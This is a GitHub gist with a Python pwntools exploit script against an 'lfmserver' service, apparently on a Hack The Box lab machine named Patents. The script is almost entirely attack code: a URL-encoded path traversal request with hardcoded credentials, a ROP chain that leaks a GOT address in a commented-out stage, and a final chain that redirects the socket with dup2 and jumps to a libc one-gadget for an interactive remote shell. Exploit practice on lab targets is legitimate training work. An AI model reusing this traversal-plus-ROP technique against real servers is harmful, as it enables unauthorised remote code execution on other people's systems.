Skip to content

Instantly share code, notes, and snippets.

@xct

xct/patents.py Secret

Created May 15, 2020 20:30
Show Gist options
  • Save xct/015d603058327f081c6fd4357de34a54 to your computer and use it in GitHub Desktop.
Save xct/015d603058327f081c6fd4357de34a54 to your computer and use it in GitHub Desktop.
patents_video_exploit
#!/usr/bin/env python3
from pwn import *
IP = '10.10.10.173'
PORT = 8888
USER = "lfmserver_user"
PASS = "!gby0l0r0ck$$!"
HASH = "dont_care"
binary = ELF('./lfmserver')
def url_encode(string):
result = ""
for char in string:
if isinstance(char, int):
char = chr(char)
enc = "%{0:0>2}".format(format(ord(char), "x"))
result += enc
return result
def send(p, payload):
buf = url_encode("../"*10)+"etc/passwd"+"%00"+url_encode("A"*119)+url_encode(payload)
b = ""
b += f"CHECK /{buf} "
b += "LFM\r\n"
b += f"User={USER}\r\n"
b += f"Password={PASS}\r\n\r\n"
b += f"{HASH}\n"
p.send(b)
POP_RDI = 0x405c4b
POP_RSI_R15 = 0x405c49
FD = 6
'''
p = remote(IP, PORT, level='debug')
payload = b""
payload += p64(POP_RDI)
payload += p64(FD)
payload += p64(POP_RSI_R15)
payload += p64(binary.got['malloc'])
payload += p64(0xcafebabe) # dummy
payload += p64(binary.symbols['write'])
send(p, payload)
'''
base = 0x7fa8d3b0a000
MAGIC = 0x501e3
p = remote(IP, PORT, level='debug')
payload = b""
payload += p64(POP_RDI) + p64(FD) + p64(POP_RSI_R15) + p64(0x0) + p64(0xcafebabe) + p64(binary.symbols['dup2'])
payload += p64(POP_RDI) + p64(FD) + p64(POP_RSI_R15) + p64(0x1) + p64(0xcafebabe) + p64(binary.symbols['dup2'])
payload += p64(POP_RDI) + p64(FD) + p64(POP_RSI_R15) + p64(0x2) + p64(0xcafebabe)+ p64(binary.symbols['dup2'])
payload += p64(base + MAGIC)
send(p, payload)
p.interactive()
Sign up for free to join this conversation on GitHub. Already have an account? Sign in to comment